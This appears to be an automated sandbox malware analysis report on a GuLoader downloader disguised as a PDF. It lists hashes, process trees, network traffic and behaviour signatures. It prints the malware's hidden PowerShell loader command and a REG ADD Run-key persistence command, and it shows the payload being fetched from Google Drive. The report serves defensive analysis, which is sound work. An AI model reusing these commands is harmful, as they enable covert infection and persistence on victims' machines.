Malware Analysis Report

2024-10-18 23:08

Sample ID 240709-ltcejaxejl
Target Vendor Data Requirements·pdf.exe
SHA256 a03913b0dcf4d9707eb9c74d69b522927e760e9be55effb0e14ebbbaad9177c7
Tags
guloader downloader execution persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a03913b0dcf4d9707eb9c74d69b522927e760e9be55effb0e14ebbbaad9177c7

Threat Level: Known bad

The file Vendor Data Requirements·pdf.exe was found to be: Known bad.

Malicious Activity Summary

guloader downloader execution persistence

Guloader,Cloudeye

Command and Scripting Interpreter: PowerShell

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Program crash

Enumerates physical storage devices

NSIS installer

Modifies registry key

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-09 09:49

Signatures

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-09 09:49

Reported

2024-07-09 09:51

Platform

win7-20240704-en

Max time kernel

95s

Max time network

101s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe"

Signatures

Guloader,Cloudeye

downloader guloader

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\\Chet\\').Ruelike;%pantstnings% ($Uselessness)" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2380 set thread context of 2752 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2488 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2752 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2380 wrote to memory of 2752 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2380 wrote to memory of 2752 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2380 wrote to memory of 2752 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2380 wrote to memory of 2752 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2380 wrote to memory of 2752 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2752 wrote to memory of 1720 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1720 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1720 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1720 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1720 wrote to memory of 1912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1720 wrote to memory of 1912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1720 wrote to memory of 1912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1720 wrote to memory of 1912 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe

"C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.201.99:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp

Files

memory/2380-11-0x0000000073801000-0x0000000073802000-memory.dmp

memory/2380-12-0x0000000073800000-0x0000000073DAB000-memory.dmp

memory/2380-13-0x0000000073800000-0x0000000073DAB000-memory.dmp

memory/2380-14-0x0000000073800000-0x0000000073DAB000-memory.dmp

memory/2380-15-0x0000000073800000-0x0000000073DAB000-memory.dmp

C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp

MD5 8172795f7c8cfb7cc597e879d2b0b468
SHA1 811797a9309a1bc3429f3bc7735eb6af1a7c80dc
SHA256 5339721e47b9ac3dfb81b6d81593e9792c57573541918c0d5ca327128aa4345c
SHA512 9718f72091367ed6a02598295a9f35512c6ddb31e3dae9b685060e613c942c755d90418cb4ea31e4bf7ea8967ce34c9356bbf53fafe08a31d851afddd55d7322

memory/2380-18-0x0000000073800000-0x0000000073DAB000-memory.dmp

memory/2380-19-0x0000000073800000-0x0000000073DAB000-memory.dmp

C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Skyldsttendes.Und

MD5 be381f7baf52513e52dfed9361a6dc69
SHA1 a6cdb30ea1a85a42404e6e2fd29c8d5cc6ad251a
SHA256 caceb5002866580c07883f8fddb62a82d7fadd1e8ca7a2eb4e11240dfda94d79
SHA512 c076aa00785538010dcc9df6aaba0f8af5f130b7edc800fca31da4fff9ee11fa728ba5c78c89047494b0536878d8b32d3f05f43177dacf0416726b02af814c8a

memory/2380-21-0x0000000073800000-0x0000000073DAB000-memory.dmp

memory/2380-22-0x0000000073800000-0x0000000073DAB000-memory.dmp

memory/2380-23-0x0000000006330000-0x0000000008B6F000-memory.dmp

memory/2752-44-0x0000000000940000-0x00000000019A2000-memory.dmp

memory/2752-45-0x00000000019B0000-0x00000000041EF000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-09 09:49

Reported

2024-07-09 09:51

Platform

win10v2004-20240704-en

Max time kernel

148s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe

"C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3060 -ip 3060

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 2452

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 37.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

memory/3060-9-0x000000007384E000-0x000000007384F000-memory.dmp

memory/3060-10-0x0000000002E00000-0x0000000002E36000-memory.dmp

memory/3060-11-0x00000000055E0000-0x0000000005C08000-memory.dmp

memory/3060-12-0x0000000073840000-0x0000000073FF0000-memory.dmp

memory/3060-13-0x0000000073840000-0x0000000073FF0000-memory.dmp

memory/3060-14-0x0000000005400000-0x0000000005422000-memory.dmp

memory/3060-15-0x0000000005D10000-0x0000000005D76000-memory.dmp

memory/3060-16-0x0000000005D80000-0x0000000005DE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t2v2wgla.tnr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3060-26-0x0000000005DF0000-0x0000000006144000-memory.dmp

memory/3060-27-0x00000000063D0000-0x00000000063EE000-memory.dmp

memory/3060-28-0x0000000006420000-0x000000000646C000-memory.dmp

memory/3060-29-0x00000000073A0000-0x0000000007436000-memory.dmp

memory/3060-30-0x0000000006910000-0x000000000692A000-memory.dmp

memory/3060-31-0x0000000006930000-0x0000000006952000-memory.dmp

memory/3060-32-0x00000000079F0000-0x0000000007F94000-memory.dmp

C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp

MD5 8172795f7c8cfb7cc597e879d2b0b468
SHA1 811797a9309a1bc3429f3bc7735eb6af1a7c80dc
SHA256 5339721e47b9ac3dfb81b6d81593e9792c57573541918c0d5ca327128aa4345c
SHA512 9718f72091367ed6a02598295a9f35512c6ddb31e3dae9b685060e613c942c755d90418cb4ea31e4bf7ea8967ce34c9356bbf53fafe08a31d851afddd55d7322

memory/3060-34-0x0000000008620000-0x0000000008C9A000-memory.dmp

memory/3060-36-0x0000000073840000-0x0000000073FF0000-memory.dmp